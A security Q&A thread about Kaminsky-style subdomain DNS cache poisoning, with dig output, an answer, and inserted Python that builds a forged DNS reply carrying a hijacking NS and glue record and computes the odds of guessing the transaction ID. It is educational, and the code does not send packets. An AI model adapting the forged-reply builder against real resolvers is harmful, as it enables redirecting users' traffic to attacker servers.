
I'm reading "Introduction to Computer Security", Pearson New International Edition, 1st edition, by Goodrich and Tamassia.

On the subject of DNS cache poisoning, they mention that a "new" attack was discovered in 2008, so-called "subdomain DNS cache poisoning". This is how that attack is supposed to play out:

  1. An attacker makes many requests to a name server for non-existing subdomains, say aaaa.example.com, aaab.example.com, aaac.example.com, etc.
  2. The book mentions that these subdomains don't exist, and that, therefore, the target authoritative name server just ignores the requests.
  3. Simultaneously, the attacker issues spoofed responses to the requests made by the name server under attack, each with a guessed transaction ID (which is randomly chosen and unknown to the attacker).
  4. Because the target authoritative name server ignores requests for non-existing domains, the attacker has opportunity to issue a lot of spoofed responses, making it likely that she will guess the correct transaction ID.

The book was written in 2011, so something might have changed in the meantime. When I dig for a non-existing subdomain, e.g. aaaa.example.com, I get a NXDOMAIN response:

$ dig @a.iana-servers.net. aaaa.example.com. +norecurse

; <<>> DiG 9.16.16 <<>> @a.iana-servers.net. aaaa.example.com. +norecurse
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NXDOMAIN, id: 20391
;; flags: qr aa; QUERY: 1, ANSWER: 0, AUTHORITY: 1, ADDITIONAL: 1
# ... snip ...

I would assume that any non-authoritative name server would put this negative result in its cache (as it should according to RFC 2308, written in March 1998).

Was it previously common practice for name servers to ignore (= not send a reply to) requests for non-existing subdomains? Has that been replaced with the NXDOMAIN reply that I see today? Is conducting the attack as described above still possible?

Edit

Turns out it was Dan Kaminsky who thought of this attack.

In this DEF CON video, he explains that at the time (2008), several authoritative name servers would not respond to certain types of DNS queries ("request polluters"), including:

  • Unknown QTYPE (e.g. FOO instead of A)
  • Unknown QCLASS (e.g. BAR instead of IN)
  • Non-existing names
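The forged reply from step 3 above and the checks that decide whether a resolver caches it, as an added example written for this page (it is not code from the book, the question or the answer). It builds the reply the way Kaminsky's variant does, with no answer for the junk subdomain but an NS record for example.com and a glue A record for that name server, then applies the checks a caching resolver makes before it trusts a reply: it must arrive on the port the query left from, carry the expected transaction ID and question, and only records inside the bailiwick of the zone being asked about are kept. The transaction ID, the ports, the name ns.attacker.example and the address 192.0.2.66 are constructed values; the reply's source IP is assumed to be spoofed to the authoritative server's address, which the example does not model.

```python
import struct

# Added example, not code from the book or the post. Names use the reserved
# example.com zone and a TEST-NET-1 address (RFC 5737); "ns.attacker.example",
# the transaction IDs and the ports below are constructed for illustration.

def encode_name(name):
    """Dotted name -> DNS wire-format labels (no compression)."""
    out = b""
    for label in name.rstrip(".").split("."):
        out += bytes([len(label)]) + label.encode("ascii")
    return out + b"\x00"

def decode_name(data, offset):
    """Wire format -> dotted name; follows compression pointers (RFC 1035 4.1.4)."""
    labels, end, jumped = [], None, False
    while True:
        length = data[offset]
        if length & 0xC0 == 0xC0:                 # 2-byte pointer to an earlier name
            if not jumped:
                end = offset + 2
            jumped = True
            offset = ((length & 0x3F) << 8) | data[offset + 1]
            continue
        offset += 1
        if length == 0:
            break
        labels.append(data[offset:offset + length].decode("ascii"))
        offset += length
    return ".".join(labels), (end if jumped else offset)

def rr(name, rtype, rdata, ttl):
    """Resource record: NAME TYPE CLASS=IN TTL RDLENGTH RDATA."""
    return encode_name(name) + struct.pack("!HHIH", rtype, 1, ttl, len(rdata)) + rdata

def build_spoofed_reply(txid, qname, zone, ns_name, ns_ip, ttl=20 * 86400):
    """Kaminsky-style forged reply: no answer for the junk name, but an
    authority NS record for the whole zone plus a glue A record that points
    the named server at the attacker's address (TTL 20 days by default)."""
    header = struct.pack("!HHHHHH", txid, 0x8400, 1, 0, 1, 1)   # QR|AA; QD=1 AN=0 NS=1 AR=1
    question = encode_name(qname) + struct.pack("!HH", 1, 1)     # QTYPE=A, QCLASS=IN
    authority = rr(zone, 2, encode_name(ns_name), ttl)           # NS record for the zone
    glue = rr(ns_name, 1, bytes(int(o) for o in ns_ip.split(".")), ttl)  # A record (glue)
    return header + question + authority + glue

def parse_reply(data):
    """Return (txid, [(qname, qtype)], [(name, type, ttl, value)])."""
    txid, _flags, qd, an, ns, ar = struct.unpack("!HHHHHH", data[:12])
    offset, questions, records = 12, [], []
    for _ in range(qd):
        name, offset = decode_name(data, offset)
        qtype, _qclass = struct.unpack("!HH", data[offset:offset + 4])
        offset += 4
        questions.append((name, qtype))
    for _ in range(an + ns + ar):
        name, offset = decode_name(data, offset)
        rtype, _rclass, ttl, rdlen = struct.unpack("!HHIH", data[offset:offset + 10])
        offset += 10
        if rtype == 1:                                   # A: four octets
            value = ".".join(str(b) for b in data[offset:offset + 4])
        elif rtype == 2:                                 # NS: a name
            value, _ = decode_name(data, offset)
        else:
            value = data[offset:offset + rdlen]
        offset += rdlen
        records.append((name, rtype, ttl, value))
    return txid, questions, records

def in_bailiwick(name, zone):
    """A record is only cacheable if it lies at or below the zone being asked about."""
    return name == zone or name.endswith("." + zone)

def resolver_accepts(reply, expected_txid, expected_port, reply_port, qname, bailiwick):
    """The checks a caching resolver makes before caching anything from a reply
    (the source IP is assumed already spoofed to the authoritative server's).
    Returns (matched, records_it_would_cache)."""
    if reply_port != expected_port:                      # fixed port 53 in 2008: nothing to guess
        return False, []
    txid, questions, records = parse_reply(reply)
    if txid != expected_txid or questions != [(qname, 1)]:
        return False, []
    return True, [r for r in records if in_bailiwick(r[0], bailiwick)]

if __name__ == "__main__":
    forged = build_spoofed_reply(0x4F9C, "aaaa.example.com", "example.com",
                                 "ns1.example.com", "192.0.2.66")
    print(resolver_accepts(forged, 0x4F9C, 53, 53, "aaaa.example.com", "example.com"))
```

In the 2008 situation the resolver's source port was a fixed, known value, so the `reply_port` check costs the attacker nothing and the only unknown is the 16-bit ID. The out-of-bailiwick case is why the attacker points the NS record at a name inside example.com rather than at her own domain: glue for a name outside the bailiwick is discarded, while glue inside it overwrites the resolver's idea of who serves example.com.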

1 Answer


As far as I know the issue is a little different, but I got my knowledge from a youtube video. (source: https://m.youtube.com/watch?v=7MT1F0O3_Yw)

The issue seems to be that you can do a lot of requests with different subdomains. Almost none of them would be in the cache of the attacked name server as those should not be real addresses. The name server then asks another name server if it knows more about this subdomain and sends a randomized 16 bit queryId with it. In the timespan between the request being issued and that other name server answering the request, the attacker can try to guess the queryId of that request. He sends a lot of requests from another, malicious, name server, guessing a different queryId for each request and saying "I don't know where aaaa.example.com is, but example.com is here: xxx.xxx.xxx.xxx, with an expiry of 20 days". If the attempt for aaaa.example.com was not successful, another query is issued with aaab.example.com and the attacker can have another few (~10) guesses. I am not sure about the mathematics of how many guesses are necessary to get a high probability of success though.

The problem is still around today; it is just made a little harder by sending a queryId and a port number, so the attacker now needs to guess both of those. They try to roll out certificates to authenticate the name servers, but I am not sure to what extent this was already done.

I do not know whether it was practice to ignore requests for non-existent domains. I don't know what NXDOMAIN stands for. I'm just repeating what was said in the video without having any additional knowledge. As per my knowledge it is still possible to do this attack, it has just gotten a little harder, see the previous paragraph for details.

Gamer2015
  • Good find! The video mentions it was [Dan Kaminsky who thought of this attack](https://en.wikipedia.org/wiki/Dan_Kaminsky#Flaw_in_DNS), which makes it way easier to find material on it. – Stefan van den Akker Jun 13 '21 at 09:26
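The mathematics the answer is unsure about, as an added worked computation for this page (it is not from the question, the answer or the video). Each junk subdomain opens one race; in a race the attacker lands some number of distinct guesses before the genuine reply arrives, and a lost race costs nothing because the next subdomain starts a fresh race with a fresh ID. The overall success probability is therefore 1 - (1 - n/S)^k for n guesses per race, a guess space of size S and k races. The 10 guesses per 10 ms race, the 1000 packets per second and the ephemeral port range 1024..65535 are assumptions chosen for the illustration.

```python
import math

# Added worked example (not from the post or the video): how the odds of the
# race described in the answer change with the size of the guess space.

TXID_SPACE = 2 ** 16          # 16-bit transaction ID: the only unknown before 2008
PORT_SPACE = 65536 - 1024     # assumption: resolver picks a random source port in 1024..65535

def guesses_per_race(window_seconds, spoofed_packets_per_second):
    """Distinct (txid[, port]) guesses the attacker can land before the genuine
    reply closes the window. 10 ms and 1000 pps give the ~10 quoted in the answer."""
    return int(round(window_seconds * spoofed_packets_per_second))

def p_success(guesses, rounds, space):
    """P(at least one race won) over `rounds` independent races, each allowing
    `guesses` distinct values out of `space` equally likely ones."""
    p_round = min(1.0, guesses / space)
    return 1.0 - (1.0 - p_round) ** rounds

def rounds_for(target, guesses, space):
    """Number of races (junk subdomains) needed to reach success probability `target`."""
    p_round = guesses / space
    if p_round >= 1.0:
        return 1
    return math.ceil(math.log1p(-target) / math.log1p(-p_round))

if __name__ == "__main__":
    g = guesses_per_race(0.01, 1000)
    print("guesses per race:                  ", g)
    print("TXID only, P(success) in 1000 races:", round(p_success(g, 1000, TXID_SPACE), 3))
    print("TXID only, races for 50%:           ", rounds_for(0.5, g, TXID_SPACE))
    print("TXID + random port, races for 50%:  ", rounds_for(0.5, g, TXID_SPACE * PORT_SPACE))
```

With only the 16-bit ID to guess, ten guesses per race need on the order of 4500 races for a coin-flip chance of success, and because every race takes only milliseconds and nothing is cached on failure, that is seconds to minutes of traffic. Adding a random source port multiplies the space by roughly 64000, so the same attacker needs on the order of 3 * 10^8 races, which is why source port randomization (plus the bailiwick rule) was the 2008 fix, even though the race itself still exists.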